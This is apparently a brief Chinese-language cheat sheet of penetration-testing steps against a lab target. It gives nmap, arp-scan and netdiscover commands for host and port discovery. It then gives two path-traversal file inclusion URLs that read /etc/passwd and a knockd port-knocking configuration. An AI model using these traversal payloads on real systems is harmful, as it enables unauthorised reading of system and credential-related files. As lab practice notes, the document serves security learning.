一、主机发现 1、nmap -sP 192.168.178.1/24 //ping扫描C段 2、arp-scan -l //感觉快一点 3、netdiscover -p 二、端口扫描 1、nmap -p 1-65535 -A 192.168.178.133 nmap -sV 靶场IP
1、文件包含: http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd 2、敲门服务: http://192.168.178.135/manage.php?file=../../../../../../../../../etc/knockd.conf[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout